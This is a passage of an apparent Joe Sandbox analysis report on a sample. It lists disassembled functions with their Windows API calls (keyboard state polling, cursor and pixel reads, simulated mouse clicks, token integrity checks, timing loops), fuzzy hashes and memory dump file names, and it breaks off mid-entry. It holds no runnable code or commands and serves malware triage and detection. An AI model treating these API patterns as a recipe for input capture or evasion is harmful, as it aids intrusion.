Instruction ID: 36da3b79bd1607665e7d9c54ab8996e495463ba179ef900e635613c975756a68
Opcode Fuzzy Hash: fd6f4d8c259556421ff74c9ed3f798fd2cd2bee45483aeb8942dfe7188cd8a83
Instruction Fuzzy Hash: 31512A35A00105DFCB01EF65D981AAEBBF5EF0A314F1484A9E809AF361CB35ED11DB64

Function 0042A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 365c4af3e26edac97f95aa559dd79f3c0706c58ef3144e37b30b59a1c46d1ad7
Instruction ID: a1a136230c9c83b20eb897b3d61dca8a9d5b817f85059a88bd4f6d8bb5b1327c
Opcode Fuzzy Hash: 365c4af3e26edac97f95aa559dd79f3c0706c58ef3144e37b30b59a1c46d1ad7
Instruction Fuzzy Hash: AB41E535B04124AFC720DF28EC48FBABBA4EB09320F940166ED15A73E1C7749D76D65A

Function 003A2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 003A2357
ScreenToClient.USER32(004657B0,?), ref: 003A2374
GetAsyncKeyState.USER32(00000001), ref: 003A2399
GetAsyncKeyState.USER32(00000002), ref: 003A23A7

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: d31ba9db2a16488ad56e228c6e40bf1721de8f46fb9ef3ca7cfb31a273e1cea6
Instruction ID: 653ffa3ffdb0589b2b5eb20f7b38326ea77fe94710a068d504d189a7d48a8672
Opcode Fuzzy Hash: d31ba9db2a16488ad56e228c6e40bf1721de8f46fb9ef3ca7cfb31a273e1cea6
Instruction Fuzzy Hash: F0418339A04115FBCF268F69D844AEABB74FB06364F61432AF824962D0C734AD54DF90

Function 003F63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003F63E7
TranslateAcceleratorW.USER32(?,?,?), ref: 003F6433
TranslateMessage.USER32(?), ref: 003F645C
DispatchMessageW.USER32(?), ref: 003F6466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003F6475

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 8e8ee66c9541cadbe8f09925cf256713eafec805cb380d61be8ce7e8e5da5452
Instruction ID: 42ff2beb416b5ee65bf18c6f14c50a655980377f8a8bd3ae40fedaeab8a7291a
Opcode Fuzzy Hash: 8e8ee66c9541cadbe8f09925cf256713eafec805cb380d61be8ce7e8e5da5452
Instruction Fuzzy Hash: A031F631A0060AAFDB26EFB1CC46FB6BBBCAB01300F510176E621C35A1E7659489DB65

Function 003F8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 003F8A30
PostMessageW.USER32(?,00000201,00000001), ref: 003F8ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 003F8AE2
PostMessageW.USER32(?,00000202,00000000), ref: 003F8AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003F8AF8

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 30f6787d174179d717aa67e3fb4c6a87bac614a5c1b0a948da5ca8b67f56130e
Instruction ID: 61d6eed69ed47851d9b666b1375582099bd0591779931372d98e9d13c36b2c9f
Opcode Fuzzy Hash: 30f6787d174179d717aa67e3fb4c6a87bac614a5c1b0a948da5ca8b67f56130e
Instruction Fuzzy Hash: 2331C27150021DEBDF18CF68DD4DAAE3BB5EB04315F504229FA25EA2D0C7B09D15DB90

Function 003FB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 003FB204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003FB221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003FB259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003FB27F
_wcsstr.LIBCMT ref: 003FB289

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: e389a082bb72febc2e3838153f6531391ee7b1266189357dad4f867835105801
Instruction ID: 3bcd8e5229f4d31f821c7ca1997395d360328572552eaa4233275746f47696a5
Opcode Fuzzy Hash: e389a082bb72febc2e3838153f6531391ee7b1266189357dad4f867835105801
Instruction Fuzzy Hash: 7921D372204204BAEB265B75DC09E7FBBACDB49750F41813DF905DA161EF61DC419360

Function 0042B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 003A2612: GetWindowLongW.USER32(?,000000EB), ref: 003A2623

GetWindowLongW.USER32(?,000000F0), ref: 0042B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0042B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0042B1CF
GetSystemMetrics.USER32(00000004), ref: 0042B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00410E90,00000000), ref: 0042B216

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 92746fcd6d0b85e02362793ab2d03b13af433c8eadec9784b094dba507c2e6c9
Instruction ID: 1950d5d315fd6ce1dc24d30805077739b528aca4d16c20459bf4e0f99110fe8f
Opcode Fuzzy Hash: 92746fcd6d0b85e02362793ab2d03b13af433c8eadec9784b094dba507c2e6c9
Instruction Fuzzy Hash: 6F218571710661EFCB209F38AC08A6B37A4EB15761F904735F931D72E0E73498619794

Function 003F9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003F9320

Part of subcall function 003A7BCC: _memmove.LIBCMT ref: 003A7C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003F9352
__itow.LIBCMT ref: 003F936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003F9392
__itow.LIBCMT ref: 003F93A3

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 0969189998edc7628a9c14b52dadcd08e02b16174a864fa03deac602df76279e
Instruction ID: f129ee59470987eb9015792e30d525065d501242942a2f5d0c95c18e3ea93983
Opcode Fuzzy Hash: 0969189998edc7628a9c14b52dadcd08e02b16174a864fa03deac602df76279e
Instruction Fuzzy Hash: A421C53570020CABDB129A659C89FFE7BADEB49710F444037FA05DB1D1D6B08D4587A1

Function 00415A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00415A6E
GetForegroundWindow.USER32 ref: 00415A85
GetDC.USER32(00000000), ref: 00415AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00415ACD
ReleaseDC.USER32(00000000,00000003), ref: 00415B08

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 0f426e08891aa2a4ff0d1b76b6c283f4e6c6a3ddd25beb3810e741d6efb30ddf
Instruction ID: a6fa62267a48654ac4f405c77efbf59964d214967b059b96ca58f93ef97275cb
Opcode Fuzzy Hash: 0f426e08891aa2a4ff0d1b76b6c283f4e6c6a3ddd25beb3810e741d6efb30ddf
Instruction Fuzzy Hash: 8721D135A00104AFD710EFA5CD88AAABBF5EF88340F40807EF84997362CA34AC45CB94

Function 003A12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 003A134D
SelectObject.GDI32(?,00000000), ref: 003A135C
BeginPath.GDI32(?), ref: 003A1373
SelectObject.GDI32(?,00000000), ref: 003A139C

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 7b128cc6ab50596e0370b765f6bb72127667895964299b6eee5ff8295547b08b
Instruction ID: 597c16bb291bf89c199bb1aa1dbdf417b19da818fc85b83590685afb09f72a80
Opcode Fuzzy Hash: 7b128cc6ab50596e0370b765f6bb72127667895964299b6eee5ff8295547b08b
Instruction Fuzzy Hash: D9215E34900608EBDF12AF25DC0476D7BA8EB01321F558236E810979F0E7B198A5DF99

Function 003FBC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 003FBCB3
_memcmp.LIBCMT ref: 003FBCD1
_memcmp.LIBCMT ref: 003FBCE4
_memcmp.LIBCMT ref: 003FBCFC
_memcmp.LIBCMT ref: 003FBD14

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 261f5695d8ee3a98bdb56bccae906159fa7913298333bb323b1b09374a520e98
Instruction ID: c35c6a7ec340418c5ee85136bae6c546846282c685dac49c1167d51708f8f424
Opcode Fuzzy Hash: 261f5695d8ee3a98bdb56bccae906159fa7913298333bb323b1b09374a520e98
Instruction Fuzzy Hash: DB01B5F260010D7BE20A6A12EE42FBBF36CDE15788F144025FE05DB343EB94EE1092A5

Function 00404A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00404ABA
__beginthreadex.LIBCMT ref: 00404AD8
MessageBoxW.USER32(?,?,?,?), ref: 00404AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00404B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00404B0A

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 49393a53186551cd30447a0751d10810fc165e6ed785e1d50ff24a27eb495966
Instruction ID: ad28d80139bf651133d235c771f1084ba1fdb769062170192ab5c49ef8e7caee
Opcode Fuzzy Hash: 49393a53186551cd30447a0751d10810fc165e6ed785e1d50ff24a27eb495966
Instruction Fuzzy Hash: 611108B6A04204BBC7119FA8DC04B9B7FBCEB85324F54427AF914E3390D6B5DD058BA5

Function 003F8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003F821E
GetLastError.KERNEL32(?,003F7CE2,?,?,?), ref: 003F8228
GetProcessHeap.KERNEL32(00000008,?,?,003F7CE2,?,?,?), ref: 003F8237
HeapAlloc.KERNEL32(00000000,?,003F7CE2,?,?,?), ref: 003F823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003F8255

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: ef323695f929b6c9313184d47e3ac9898322fb58b6d62bd4cce3cf42e5d8e0d1
Instruction ID: d6a98681cb18b9e2cb9bc1d9dc2716f15ada1296014e8bec86ca9a2b9357f188
Opcode Fuzzy Hash: ef323695f929b6c9313184d47e3ac9898322fb58b6d62bd4cce3cf42e5d8e0d1
Instruction Fuzzy Hash: F3016971701608BFDB254FA6DC48D7B7BBCEF8A754B900879F909C2220DB319C16CA60

Function 003F710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003F7044,80070057,?,?,?,003F7455), ref: 003F7127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003F7044,80070057,?,?), ref: 003F7142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003F7044,80070057,?,?), ref: 003F7150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003F7044,80070057,?), ref: 003F7160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003F7044,80070057,?,?), ref: 003F716C

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 75455e95c9a79c27b0e97733550305ee3cb69ad67178c87d066518562c9335d9
Instruction ID: 478591cea1487c4e32134628c4a79b88cb64a5ca015812b892dc6f434540c833
Opcode Fuzzy Hash: 75455e95c9a79c27b0e97733550305ee3cb69ad67178c87d066518562c9335d9
Instruction Fuzzy Hash: DD018F72601208BBDB229F64DC44BAABBBDEF44791F550074FE04D2220DB31DD5A9BA0

Function 00405244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0040526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00405280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004052BC

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 3625bcd7204343b2f232297b6b4c9c8a09b94e8dd539c3022ccdf86ec3396496
Instruction ID: 64d253efb1068d453ae59efb42cb21fd792645b8a3c4f1990fae493701312ee3
Opcode Fuzzy Hash: 3625bcd7204343b2f232297b6b4c9c8a09b94e8dd539c3022ccdf86ec3396496
Instruction Fuzzy Hash: A5013C35D01A19DBDF10AFA4D8486EEBB78FF09711F8000BAD541B2280CB3459658FA9

Function 003F810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003F8121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003F812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003F813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003F8141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003F8157

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: fdf1f0990c5dba1781b1651b850efbfc55f79babb38dc9d8b5b977db6056ae47
Instruction ID: eb4197bbefe44988e8066d793e96eada1132f5ad4079a6a1b234713233442ed3
Opcode Fuzzy Hash: fdf1f0990c5dba1781b1651b850efbfc55f79babb38dc9d8b5b977db6056ae47
Instruction Fuzzy Hash: 0AF04F71300308AFEB220FA5EC88E773BBCEF49B54B800135FA45D6150CB619D56DA64

Function 003FC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 003FC1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 003FC20E
MessageBeep.USER32(00000000), ref: 003FC226
KillTimer.USER32(?,0000040A), ref: 003FC242
EndDialog.USER32(?,00000001), ref: 003FC25C

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: cbb4ab237126ba1a489fc6c44b028e4632809646dc112bd3a08315e7d6514ea4
Instruction ID: 5b0538721fa00bfa4e33d2e14f01bea0d5ec39ca115548c4e1b392379c97ac72
Opcode Fuzzy Hash: cbb4ab237126ba1a489fc6c44b028e4632809646dc112bd3a08315e7d6514ea4
Instruction Fuzzy Hash: E101A23055430CABEB315B60EE4EFA677B8FB00B06F80067DA642A14E1DBE469499B94

Function 003A13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 003A13BF
StrokeAndFillPath.GDI32(?,?,003DB888,00000000,?), ref: 003A13DB
SelectObject.GDI32(?,00000000), ref: 003A13EE
DeleteObject.GDI32 ref: 003A1401
StrokePath.GDI32(?), ref: 003A141C

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 400834374c61ba2624bcf34f8c594a6b0da1ce474906933cbad327b9e659f4a6
Instruction ID: 710c3fa6c9467e92f7dbed14abc62849ad5271a7c055c894d5c63bada2301b3e
Opcode Fuzzy Hash: 400834374c61ba2624bcf34f8c594a6b0da1ce474906933cbad327b9e659f4a6
Instruction Fuzzy Hash: 87F01D30200608DBDB226F1AEC4C7583BB5EB02326F888234E4694A8F1D77449A6DF19

Function 003B2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 003C0DB6: std::exception::exception.LIBCMT ref: 003C0DEC
